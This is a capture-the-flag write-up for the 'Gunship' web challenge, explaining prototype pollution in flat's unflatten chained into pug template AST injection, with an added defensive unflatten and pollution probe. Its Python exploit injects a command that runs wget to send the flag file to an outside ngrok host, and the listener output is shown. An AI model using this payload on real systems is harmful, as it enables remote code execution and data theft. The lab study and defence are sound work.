Gunship

Challenge Description

A city of lights, with retrofuturistic 80s peoples, and coffee, and drinks from another world… all the wooing in the world to make you feel more lonely… this ride ends here, with a tribute page of the British synthwave band called Gunship. 🎶

Category: Web
Difficulty: Very Easy

Solution

Looking at the application code we find the following endpoint.

challenge/routes/index.js
// Imports implied by the snippet (express, pug and flat's unflatten); the
// original excerpt starts at the route handler.
const express = require('express');
const pug = require('pug');
const { unflatten } = require('flat');
const router = express.Router();

router.post('/api/submit', (req, res) => {
	// The JSON body is expanded with flat's unflatten before any validation.
	const { artist } = unflatten(req.body);

	if (artist.name.includes('Haigh') || artist.name.includes('Westaway') || artist.name.includes('Gingell')) {
		return res.json({
			// A pug template is compiled on every submission that names a member.
			'response': pug.compile('span Hello #{user}, thank you for letting us know!')({ user: 'guest' })
		});
	} else {
		return res.json({
			'response': 'Please provide us with the full name of an existing member.'
		});
	}
});

module.exports = router;

The handler uses pug.compile, and package.json tells us which versions are in play.

challenge/package.json
	"dependencies": {
		"express": "^4.17.1",
		"flat": "5.0.0",
		"pug": "^3.0.0"
	}

Looking into these versions we find they are affected by prototype pollution: flat's unflatten turns a dotted __proto__ key into a write to Object.prototype, and the block node left there is picked up by pug's compiler on the next submission that passes the name check. We exploit it as follows.

import requests

# Challenge instance and listener URLs as they were at the time of the writeup.
url = 'http://94.237.59.180:50082/api/submit'

# Second request: a valid member name, so the handler reaches pug.compile.
name = {
    "artist.name":"Westaway"
}

# First request: unflatten walks "__proto__.block" and writes the node into
# Object.prototype, where pug's compiler later finds it.
payload = {
    "__proto__.block": {
        "type": "Text", 
        "line": "console.log(process.mainModule.require('child_process').execSync('wget https://9949-31-208-78-26.ngrok-free.app/`(cat flag*)`').toString())"
    }
}

response_send = requests.post(url, json=payload)      # pollute the prototype
response_execute = requests.post(url, json=name)      # trigger the compile

print(response_send.text)
print(response_execute.text)

We start ngrok and a Python HTTP server to receive the callback.

ngrok http 8081
python3 -m http.server 8081

Running the script, the flag arrives in the request path on our listener.

python3 exploit.py
┌──(root㉿kali)-[~/Downloads]
└─# python3 -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
127.0.0.1 - - [18/Feb/2025 11:46:58] code 404, message File not found
127.0.0.1 - - [18/Feb/2025 11:46:58] "GET /HTB%7Bwh3n_lif3_g1v3s_y0u_p6_st4rT_p0llut1ng_w1th_styl3%21%21%7D HTTP/1.1" 404 -
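To show the first half of that chain from the defender's side, here is an added example (not the challenge's code and not the flat library's source): a minimal dotted-key unflatten in the style the endpoint relies on, beside a hardened variant that refuses __proto__, constructor and prototype segments, plus a probe that reports whether Object.prototype has already been polluted. All inputs are constructed.

```javascript
// Added example: not the challenge's code and not the flat library's source.
// A minimal dotted-key unflatten in the style the endpoint relies on, beside a
// hardened variant that refuses prototype-polluting paths.

// Path segments that must never become property names while descending.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// Naive unflatten: "a.b" -> { a: { b: value } } with no key filtering.
// When a segment is "__proto__", cur["__proto__"] resolves to Object.prototype,
// so the final assignment lands on every object in the process.
function naiveUnflatten(flat) {
  const out = {};
  for (const [path, value] of Object.entries(flat)) {
    const parts = path.split('.');
    let cur = out;
    for (let i = 0; i < parts.length - 1; i++) {
      if (typeof cur[parts[i]] !== 'object' || cur[parts[i]] === null) {
        cur[parts[i]] = {};
      }
      cur = cur[parts[i]];
    }
    cur[parts[parts.length - 1]] = value;
  }
  return out;
}

// Hardened unflatten: rejects forbidden segments up front and only walks own
// properties, so request data can never reach Object.prototype.
function safeUnflatten(flat) {
  const out = {};
  for (const [path, value] of Object.entries(flat)) {
    const parts = path.split('.');
    if (parts.some((p) => FORBIDDEN_SEGMENTS.has(p))) {
      throw new Error(`rejected prototype-polluting key: ${path}`);
    }
    let cur = out;
    for (let i = 0; i < parts.length - 1; i++) {
      if (!Object.prototype.hasOwnProperty.call(cur, parts[i])) cur[parts[i]] = {};
      cur = cur[parts[i]];
    }
    cur[parts[parts.length - 1]] = value;
  }
  return out;
}

// Probe: true if a fresh object inherits the property, i.e. Object.prototype
// has already been polluted with it.
function isPolluted(prop) {
  return prop in {};
}
```

Running the probe after each request handler in a test suite is a cheap regression check that a body parser change has not reopened the pollution path.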

References

https://blog.p6.is/AST-Injection/
https://portswigger.net/daily-swig/prototype-pollution-the-dangerous-and-underrated-vulnerability-impacting-javascript-applications
https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7
https://ngrok.com/